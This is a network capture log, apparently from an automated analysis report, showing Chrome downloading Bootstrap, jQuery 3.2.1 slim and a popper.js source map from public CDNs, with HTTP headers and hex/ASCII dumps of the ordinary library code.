                                                                                                                  2024-10-22 14:08:36 UTC1369INData Raw: 21 2f 69 6e 70 75 74 7c 74 65 78 74 61 72 65 61 2f 69 2e 74 65 73 74 28 74 2e 74 61 72 67 65 74 2e 74 61 67 4e 61 6d 65 29 29 73 77 69 74 63 68 28 74 2e 77 68 69 63 68 29 7b 63 61 73 65 20 33 37 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 70 72 65 76 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 39 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 6e 65 78 74 28 29 7d 7d 2c 43 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 74 65 6d 73 3d 74 2e 6d 61 6b 65 41 72 72 61 79 28 74 28 65 29 2e 70 61 72 65 6e 74 28 29 2e 66 69 6e 64 28 79 2e 49 54 45 4d 29 29 2c 74 68 69 73 2e 5f 69 74 65 6d 73 2e 69 6e 64 65 78 4f 66 28 65 29 7d 2c
                                                                                                                  Data Ascii: !/input|textarea/i.test(t.target.tagName))switch(t.which){case 37:t.preventDefault(),this.prev();break;case 39:t.preventDefault(),this.next()}},C._getItemIndex=function(e){return this._items=t.makeArray(t(e).parent().find(y.ITEM)),this._items.indexOf(e)},
                                                                                                                  2024-10-22 14:08:36 UTC1369INData Raw: 28 64 2e 53 4c 49 44 2c 7b 72 65 6c 61 74 65 64 54 61 72 67 65 74 3a 63 2c 64 69 72 65 63 74 69 6f 6e 3a 72 2c 66 72 6f 6d 3a 6c 2c 74 6f 3a 5f 7d 29 3b 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 70 29 3f 28 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 73 29 2c 50 2e 72 65 66 6c 6f 77 28 63 29 2c 74 28 61 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 61 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 63 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 69 2b 22 20 22 2b 73 29 2e 61 64 64 43 6c 61 73 73 28 67 29 2c 74 28 61 29 2e 72 65 6d 6f
                                                                                                                  Data Ascii: (d.SLID,{relatedTarget:c,direction:r,from:l,to:_});P.supportsTransitionEnd()&&t(this._element).hasClass(p)?(t(c).addClass(s),P.reflow(c),t(a).addClass(i),t(c).addClass(i),t(a).one(P.TRANSITION_END,function(){t(c).removeClass(i+" "+s).addClass(g),t(a).remo
                                                                                                                  2024-10-22 14:08:36 UTC1369INData Raw: 41 54 41 5f 41 50 49 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 79 2e 44 41 54 41 5f 52 49 44 45 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 28 74 68 69 73 29 3b 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 65 2c 65 2e 64 61 74 61 28 29 29 7d 29 7d 29 2c 74 2e 66 6e 5b 65 5d 3d 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 74 2e 66 6e 5b 65 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 43 2c 74 2e 66 6e 5b 65 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 66 6e 5b 65 5d 3d 6f 2c 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 43 7d 28 65 29 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 22 63 6f 6c 6c 61 70 73 65
                                                                                                                  Data Ascii: ATA_API,function(){t(y.DATA_RIDE).each(function(){var e=t(this);C._jQueryInterface.call(e,e.data())})}),t.fn[e]=C._jQueryInterface,t.fn[e].Constructor=C,t.fn[e].noConflict=function(){return t.fn[e]=o,C._jQueryInterface},C}(e),H=function(t){var e="collapse


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  36192.168.2.1649764151.101.66.1374432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:36 UTC363OUTGET /jquery-3.2.1.slim.min.js HTTP/1.1
                                                                                                                  Host: code.jquery.com
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:36 UTC610INHTTP/1.1 200 OK
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 69597
                                                                                                                  Server: nginx
                                                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                  ETag: "28feccc0-10fdd"
                                                                                                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:36 GMT
                                                                                                                  Age: 2862446
                                                                                                                  X-Served-By: cache-lga21963-LGA, cache-dfw-kdal2120092-DFW
                                                                                                                  X-Cache: HIT, HIT
                                                                                                                  X-Cache-Hits: 6, 1
                                                                                                                  X-Timer: S1729606116.496400,VS0,VE1
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  2024-10-22 14:08:36 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 32 2e 31 20 2d 61 6a 61 78 2c 2d 61 6a 61 78 2f 6a 73 6f 6e 70 2c 2d 61 6a 61 78 2f 6c 6f 61 64 2c 2d 61 6a 61 78 2f 70 61 72 73 65 58 4d 4c 2c 2d 61 6a 61 78 2f 73 63 72 69 70 74 2c 2d 61 6a 61 78 2f 76 61 72 2f 6c 6f 63 61 74 69 6f 6e 2c 2d 61 6a 61 78 2f 76 61 72 2f 6e 6f 6e 63 65 2c 2d 61 6a 61 78 2f 76 61 72 2f 72 71 75 65 72 79 2c 2d 61 6a 61 78 2f 78 68 72 2c 2d 6d 61 6e 69 70 75 6c 61 74 69 6f 6e 2f 5f 65 76 61 6c 55 72 6c 2c 2d 65 76 65 6e 74 2f 61 6a 61 78 2c 2d 65 66 66 65 63 74 73 2c 2d 65 66 66 65 63 74 73 2f 54 77 65 65 6e 2c 2d 65 66 66 65 63 74 73 2f 61 6e 69 6d 61 74 65 64 53 65 6c 65 63 74 6f 72 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e
                                                                                                                  Data Ascii: /*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other con
                                                                                                                  2024-10-22 14:08:36 UTC16384INData Raw: 7c 5b 5d 2c 6e 3d 6a 5b 30 5d 3d 3d 3d 77 26 26 6a 5b 31 5d 2c 74 3d 6e 26 26 6a 5b 32 5d 2c 6d 3d 6e 26 26 71 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 6e 5d 3b 77 68 69 6c 65 28 6d 3d 2b 2b 6e 26 26 6d 26 26 6d 5b 70 5d 7c 7c 28 74 3d 6e 3d 30 29 7c 7c 6f 2e 70 6f 70 28 29 29 69 66 28 31 3d 3d 3d 6d 2e 6e 6f 64 65 54 79 70 65 26 26 2b 2b 74 26 26 6d 3d 3d 3d 62 29 7b 6b 5b 61 5d 3d 5b 77 2c 6e 2c 74 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 73 26 26 28 6d 3d 62 2c 6c 3d 6d 5b 75 5d 7c 7c 28 6d 5b 75 5d 3d 7b 7d 29 2c 6b 3d 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 2c 6a 3d 6b 5b 61 5d 7c 7c 5b 5d 2c 6e 3d 6a 5b 30 5d 3d 3d 3d 77 26 26 6a 5b 31 5d 2c 74 3d 6e 29 2c 74 3d 3d 3d 21 31 29 77 68 69
                                                                                                                  Data Ascii: |[],n=j[0]===w&&j[1],t=n&&j[2],m=n&&q.childNodes[n];while(m=++n&&m&&m[p]||(t=n=0)||o.pop())if(1===m.nodeType&&++t&&m===b){k[a]=[w,n,t];break}}else if(s&&(m=b,l=m[u]||(m[u]={}),k=l[m.uniqueID]||(l[m.uniqueID]={}),j=k[a]||[],n=j[0]===w&&j[1],t=n),t===!1)whi
                                                                                                                  2024-10-22 14:08:36 UTC16384INData Raw: 65 2c 66 2c 67 29 7b 76 61 72 20 68 3d 30 2c 69 3d 61 2e 6c 65 6e 67 74 68 2c 6a 3d 6e 75 6c 6c 3d 3d 63 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 3d 72 2e 74 79 70 65 28 63 29 29 7b 65 3d 21 30 3b 66 6f 72 28 68 20 69 6e 20 63 29 54 28 61 2c 62 2c 68 2c 63 5b 68 5d 2c 21 30 2c 66 2c 67 29 7d 65 6c 73 65 20 69 66 28 76 6f 69 64 20 30 21 3d 3d 64 26 26 28 65 3d 21 30 2c 72 2e 69 73 46 75 6e 63 74 69 6f 6e 28 64 29 7c 7c 28 67 3d 21 30 29 2c 6a 26 26 28 67 3f 28 62 2e 63 61 6c 6c 28 61 2c 64 29 2c 62 3d 6e 75 6c 6c 29 3a 28 6a 3d 62 2c 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 6a 2e 63 61 6c 6c 28 72 28 61 29 2c 63 29 7d 29 29 2c 62 29 29 66 6f 72 28 3b 68 3c 69 3b 68 2b 2b 29 62 28 61 5b 68 5d 2c 63 2c 67 3f 64 3a 64 2e 63
                                                                                                                  Data Ascii: e,f,g){var h=0,i=a.length,j=null==c;if("object"===r.type(c)){e=!0;for(h in c)T(a,b,h,c[h],!0,f,g)}else if(void 0!==d&&(e=!0,r.isFunction(d)||(g=!0),j&&(g?(b.call(a,d),b=null):(j=b,b=function(a,b,c){return j.call(r(a),c)})),b))for(;h<i;h++)b(a[h],c,g?d:d.c
                                                                                                                  2024-10-22 14:08:37 UTC16384INData Raw: 6f 5d 29 7b 69 66 28 62 2e 65 76 65 6e 74 73 29 66 6f 72 28 64 20 69 6e 20 62 2e 65 76 65 6e 74 73 29 65 5b 64 5d 3f 72 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 63 2c 64 29 3a 72 2e 72 65 6d 6f 76 65 45 76 65 6e 74 28 63 2c 64 2c 62 2e 68 61 6e 64 6c 65 29 3b 63 5b 57 2e 65 78 70 61 6e 64 6f 5d 3d 76 6f 69 64 20 30 7d 63 5b 58 2e 65 78 70 61 6e 64 6f 5d 26 26 28 63 5b 58 2e 65 78 70 61 6e 64 6f 5d 3d 76 6f 69 64 20 30 29 7d 7d 7d 29 2c 72 2e 66 6e 2e 65 78 74 65 6e 64 28 7b 64 65 74 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 4b 61 28 74 68 69 73 2c 61 2c 21 30 29 7d 2c 72 65 6d 6f 76 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 4b 61 28 74 68 69 73 2c 61 29 7d 2c 74 65 78 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29
                                                                                                                  Data Ascii: o]){if(b.events)for(d in b.events)e[d]?r.event.remove(c,d):r.removeEvent(c,d,b.handle);c[W.expando]=void 0}c[X.expando]&&(c[X.expando]=void 0)}}}),r.fn.extend({detach:function(a){return Ka(this,a,!0)},remove:function(a){return Ka(this,a)},text:function(a)
                                                                                                                  2024-10-22 14:08:37 UTC4061INData Raw: 46 75 6e 63 74 69 6f 6e 28 61 29 3f 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 28 74 68 69 73 29 2e 77 72 61 70 49 6e 6e 65 72 28 61 2e 63 61 6c 6c 28 74 68 69 73 2c 62 29 29 7d 29 3a 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3d 72 28 74 68 69 73 29 2c 63 3d 62 2e 63 6f 6e 74 65 6e 74 73 28 29 3b 63 2e 6c 65 6e 67 74 68 3f 63 2e 77 72 61 70 41 6c 6c 28 61 29 3a 62 2e 61 70 70 65 6e 64 28 61 29 7d 29 7d 2c 77 72 61 70 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 72 2e 69 73 46 75 6e 63 74 69 6f 6e 28 61 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 28 74 68 69 73 29 2e 77 72 61 70 41 6c 6c 28 62 3f 61 2e 63 61 6c 6c 28 74 68 69 73 2c
                                                                                                                  Data Ascii: Function(a)?this.each(function(b){r(this).wrapInner(a.call(this,b))}):this.each(function(){var b=r(this),c=b.contents();c.length?c.wrapAll(a):b.append(a)})},wrap:function(a){var b=r.isFunction(a);return this.each(function(c){r(this).wrapAll(b?a.call(this,


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  37192.168.2.1649765104.17.24.144432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:36 UTC388OUTGET /ajax/libs/popper.js/1.12.9/umd/popper.min.js.map HTTP/1.1
                                                                                                                  Host: cdnjs.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:36 UTC962INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:36 GMT
                                                                                                                  Content-Type: application/octet-stream; charset=utf-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Cache-Control: public, max-age=30672000
                                                                                                                  ETag: W/"5eb03fa9-1b7cb"
                                                                                                                  Last-Modified: Mon, 04 May 2020 16:15:37 GMT
                                                                                                                  cf-cdnjs-via: cfworker/kv
                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                  Timing-Allow-Origin: *
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  CF-Cache-Status: HIT
                                                                                                                  Age: 50866
                                                                                                                  Expires: Sun, 12 Oct 2025 14:08:36 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oCwihk3RN9MkpYmqLbqyaNvwsy%2BHtJVwWuH85PzHH1LFtiMcBkQMkZ%2Fy8X9Gw%2FmVAuCfswoB1Y8nSAwqzBGh%2FSwoyvOaI86iaDQs3qmTQah4s2bQq0FlEUCwrHtH4LifKFnFQYIZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Strict-Transport-Security: max-age=15780000
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a0f742bd5e99b-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:08:36 UTC407INData Raw: 37 62 65 65 0d 0a 7b 22 76 65 72 73 69 6f 6e 22 3a 33 2c 22 66 69 6c 65 22 3a 22 70 6f 70 70 65 72 2e 6d 69 6e 2e 6a 73 22 2c 22 73 6f 75 72 63 65 73 22 3a 5b 22 2e 2e 2f 2e 2e 2f 73 72 63 2f 75 74 69 6c 73 2f 69 73 46 75 6e 63 74 69 6f 6e 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 72 63 2f 75 74 69 6c 73 2f 67 65 74 53 74 79 6c 65 43 6f 6d 70 75 74 65 64 50 72 6f 70 65 72 74 79 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 72 63 2f 75 74 69 6c 73 2f 67 65 74 50 61 72 65 6e 74 4e 6f 64 65 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 72 63 2f 75 74 69 6c 73 2f 67 65 74 53 63 72 6f 6c 6c 50 61 72 65 6e 74 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 72 63 2f 75 74 69 6c 73 2f 67 65 74 4f 66 66 73 65 74 50 61 72 65 6e 74 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 72 63 2f 75 74 69 6c
                                                                                                                  Data Ascii: 7bee{"version":3,"file":"popper.min.js","sources":["../../src/utils/isFunction.js","../../src/utils/getStyleComputedProperty.js","../../src/utils/getParentNode.js","../../src/utils/getScrollParent.js","../../src/utils/getOffsetParent.js","../../src/util
                                                                                                                  2024-10-22 14:08:36 UTC1369INData Raw: 53 63 72 6f 6c 6c 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 72 63 2f 75 74 69 6c 73 2f 67 65 74 42 6f 72 64 65 72 73 53 69 7a 65 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 72 63 2f 75 74 69 6c 73 2f 67 65 74 57 69 6e 64 6f 77 53 69 7a 65 73 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 72 63 2f 75 74 69 6c 73 2f 67 65 74 43 6c 69 65 6e 74 52 65 63 74 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 72 63 2f 75 74 69 6c 73 2f 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 72 63 2f 75 74 69 6c 73 2f 67 65 74 4f 66 66 73 65 74 52 65 63 74 52 65 6c 61 74 69 76 65 54 6f 41 72 62 69 74 72 61 72 79 4e 6f 64 65 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 72 63 2f 75 74 69 6c 73 2f 67 65 74 56 69 65 77 70 6f 72 74 4f 66 66 73 65 74 52 65
                                                                                                                  Data Ascii: Scroll.js","../../src/utils/getBordersSize.js","../../src/utils/getWindowSizes.js","../../src/utils/getClientRect.js","../../src/utils/getBoundingClientRect.js","../../src/utils/getOffsetRectRelativeToArbitraryNode.js","../../src/utils/getViewportOffsetRe
                                                                                                                  2024-10-22 14:08:36 UTC1369INData Raw: 6f 64 69 66 69 65 72 73 2f 66 6c 69 70 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 72 63 2f 69 6e 64 65 78 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 72 63 2f 6d 65 74 68 6f 64 73 2f 64 65 66 61 75 6c 74 73 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 72 63 2f 6d 6f 64 69 66 69 65 72 73 2f 69 6e 64 65 78 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 72 63 2f 6d 6f 64 69 66 69 65 72 73 2f 73 68 69 66 74 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 72 63 2f 6d 6f 64 69 66 69 65 72 73 2f 70 72 65 76 65 6e 74 4f 76 65 72 66 6c 6f 77 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 72 63 2f 6d 6f 64 69 66 69 65 72 73 2f 6b 65 65 70 54 6f 67 65 74 68 65 72 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 72 63 2f 6d 6f 64 69 66 69 65 72 73 2f 69 6e 6e 65 72 2e 6a 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 72 63 2f 6d
                                                                                                                  Data Ascii: odifiers/flip.js","../../src/index.js","../../src/methods/defaults.js","../../src/modifiers/index.js","../../src/modifiers/shift.js","../../src/modifiers/preventOverflow.js","../../src/modifiers/keepTogether.js","../../src/modifiers/inner.js","../../src/m
                                                                                                                  2024-10-22 14:08:36 UTC1369INData Raw: 65 4e 61 6d 65 20 3d 3d 3d 20 27 48 54 4d 4c 27 29 20 7b 5c 6e 20 20 20 20 72 65 74 75 72 6e 20 65 6c 65 6d 65 6e 74 3b 5c 6e 20 20 7d 5c 6e 20 20 72 65 74 75 72 6e 20 65 6c 65 6d 65 6e 74 2e 70 61 72 65 6e 74 4e 6f 64 65 20 7c 7c 20 65 6c 65 6d 65 6e 74 2e 68 6f 73 74 3b 5c 6e 7d 5c 6e 22 2c 22 69 6d 70 6f 72 74 20 67 65 74 53 74 79 6c 65 43 6f 6d 70 75 74 65 64 50 72 6f 70 65 72 74 79 20 66 72 6f 6d 20 27 2e 2f 67 65 74 53 74 79 6c 65 43 6f 6d 70 75 74 65 64 50 72 6f 70 65 72 74 79 27 3b 5c 6e 69 6d 70 6f 72 74 20 67 65 74 50 61 72 65 6e 74 4e 6f 64 65 20 66 72 6f 6d 20 27 2e 2f 67 65 74 50 61 72 65 6e 74 4e 6f 64 65 27 3b 5c 6e 5c 6e 2f 2a 2a 5c 6e 20 2a 20 52 65 74 75 72 6e 73 20 74 68 65 20 73 63 72 6f 6c 6c 69 6e 67 20 70 61 72 65 6e 74 20 6f 66 20
                                                                                                                  Data Ascii: eName === 'HTML') {\n return element;\n }\n return element.parentNode || element.host;\n}\n","import getStyleComputedProperty from './getStyleComputedProperty';\nimport getParentNode from './getParentNode';\n\n/**\n * Returns the scrolling parent of
                                                                                                                  2024-10-22 14:08:36 UTC1369INData Raw: 50 61 72 65 6e 74 20 3d 20 65 6c 65 6d 65 6e 74 20 26 26 20 65 6c 65 6d 65 6e 74 2e 6f 66 66 73 65 74 50 61 72 65 6e 74 3b 5c 6e 20 20 63 6f 6e 73 74 20 6e 6f 64 65 4e 61 6d 65 20 3d 20 6f 66 66 73 65 74 50 61 72 65 6e 74 20 26 26 20 6f 66 66 73 65 74 50 61 72 65 6e 74 2e 6e 6f 64 65 4e 61 6d 65 3b 5c 6e 5c 6e 20 20 69 66 20 28 21 6e 6f 64 65 4e 61 6d 65 20 7c 7c 20 6e 6f 64 65 4e 61 6d 65 20 3d 3d 3d 20 27 42 4f 44 59 27 20 7c 7c 20 6e 6f 64 65 4e 61 6d 65 20 3d 3d 3d 20 27 48 54 4d 4c 27 29 20 7b 5c 6e 20 20 20 20 69 66 20 28 65 6c 65 6d 65 6e 74 29 20 7b 5c 6e 20 20 20 20 20 20 72 65 74 75 72 6e 20 65 6c 65 6d 65 6e 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 5c 6e 20 20 20 20 7d 5c 6e 5c 6e 20 20 20 20
                                                                                                                  Data Ascii: Parent = element && element.offsetParent;\n const nodeName = offsetParent && offsetParent.nodeName;\n\n if (!nodeName || nodeName === 'BODY' || nodeName === 'HTML') {\n if (element) {\n return element.ownerDocument.documentElement\n }\n\n
                                                                                                                  2024-10-22 14:08:36 UTC1369INData Raw: 50 61 72 65 6e 74 20 66 72 6f 6d 20 27 2e 2f 67 65 74 4f 66 66 73 65 74 50 61 72 65 6e 74 27 3b 5c 6e 5c 6e 2f 2a 2a 5c 6e 20 2a 20 46 69 6e 64 73 20 74 68 65 20 6f 66 66 73 65 74 20 70 61 72 65 6e 74 20 63 6f 6d 6d 6f 6e 20 74 6f 20 74 68 65 20 74 77 6f 20 70 72 6f 76 69 64 65 64 20 6e 6f 64 65 73 5c 6e 20 2a 20 40 6d 65 74 68 6f 64 5c 6e 20 2a 20 40 6d 65 6d 62 65 72 6f 66 20 50 6f 70 70 65 72 2e 55 74 69 6c 73 5c 6e 20 2a 20 40 61 72 67 75 6d 65 6e 74 20 7b 45 6c 65 6d 65 6e 74 7d 20 65 6c 65 6d 65 6e 74 31 5c 6e 20 2a 20 40 61 72 67 75 6d 65 6e 74 20 7b 45 6c 65 6d 65 6e 74 7d 20 65 6c 65 6d 65 6e 74 32 5c 6e 20 2a 20 40 72 65 74 75 72 6e 73 20 7b 45 6c 65 6d 65 6e 74 7d 20 63 6f 6d 6d 6f 6e 20 6f 66 66 73 65 74 20 70 61 72 65 6e 74 5c 6e 20 2a 2f 5c
                                                                                                                  Data Ascii: Parent from './getOffsetParent';\n\n/**\n * Finds the offset parent common to the two provided nodes\n * @method\n * @memberof Popper.Utils\n * @argument {Element} element1\n * @argument {Element} element2\n * @returns {Element} common offset parent\n */\
                                                                                                                  2024-10-22 14:08:36 UTC1369INData Raw: 73 20 69 6e 73 69 64 65 20 73 68 61 64 6f 77 44 4f 4d 2c 20 66 69 6e 64 20 77 68 69 63 68 20 6f 6e 65 5c 6e 20 20 63 6f 6e 73 74 20 65 6c 65 6d 65 6e 74 31 72 6f 6f 74 20 3d 20 67 65 74 52 6f 6f 74 28 65 6c 65 6d 65 6e 74 31 29 3b 5c 6e 20 20 69 66 20 28 65 6c 65 6d 65 6e 74 31 72 6f 6f 74 2e 68 6f 73 74 29 20 7b 5c 6e 20 20 20 20 72 65 74 75 72 6e 20 66 69 6e 64 43 6f 6d 6d 6f 6e 4f 66 66 73 65 74 50 61 72 65 6e 74 28 65 6c 65 6d 65 6e 74 31 72 6f 6f 74 2e 68 6f 73 74 2c 20 65 6c 65 6d 65 6e 74 32 29 3b 5c 6e 20 20 7d 20 65 6c 73 65 20 7b 5c 6e 20 20 20 20 72 65 74 75 72 6e 20 66 69 6e 64 43 6f 6d 6d 6f 6e 4f 66 66 73 65 74 50 61 72 65 6e 74 28 65 6c 65 6d 65 6e 74 31 2c 20 67 65 74 52 6f 6f 74 28 65 6c 65 6d 65 6e 74 32 29 2e 68 6f 73 74 29 3b 5c 6e 20
                                                                                                                  Data Ascii: s inside shadowDOM, find which one\n const element1root = getRoot(element1);\n if (element1root.host) {\n return findCommonOffsetParent(element1root.host, element2);\n } else {\n return findCommonOffsetParent(element1, getRoot(element2).host);\n
                                                                                                                  2024-10-22 14:08:36 UTC1369INData Raw: 7b 4f 62 6a 65 63 74 7d 20 72 65 63 74 20 2d 20 54 68 65 20 6d 6f 64 69 66 69 65 72 20 72 65 63 74 20 6f 62 6a 65 63 74 5c 6e 20 2a 2f 5c 6e 65 78 70 6f 72 74 20 64 65 66 61 75 6c 74 20 66 75 6e 63 74 69 6f 6e 20 69 6e 63 6c 75 64 65 53 63 72 6f 6c 6c 28 72 65 63 74 2c 20 65 6c 65 6d 65 6e 74 2c 20 73 75 62 74 72 61 63 74 20 3d 20 66 61 6c 73 65 29 20 7b 5c 6e 20 20 63 6f 6e 73 74 20 73 63 72 6f 6c 6c 54 6f 70 20 3d 20 67 65 74 53 63 72 6f 6c 6c 28 65 6c 65 6d 65 6e 74 2c 20 27 74 6f 70 27 29 3b 5c 6e 20 20 63 6f 6e 73 74 20 73 63 72 6f 6c 6c 4c 65 66 74 20 3d 20 67 65 74 53 63 72 6f 6c 6c 28 65 6c 65 6d 65 6e 74 2c 20 27 6c 65 66 74 27 29 3b 5c 6e 20 20 63 6f 6e 73 74 20 6d 6f 64 69 66 69 65 72 20 3d 20 73 75 62 74 72 61 63 74 20 3f 20 2d 31 20 3a 20 31
                                                                                                                  Data Ascii: {Object} rect - The modifier rect object\n */\nexport default function includeScroll(rect, element, subtract = false) {\n const scrollTop = getScroll(element, 'top');\n const scrollLeft = getScroll(element, 'left');\n const modifier = subtract ? -1 : 1
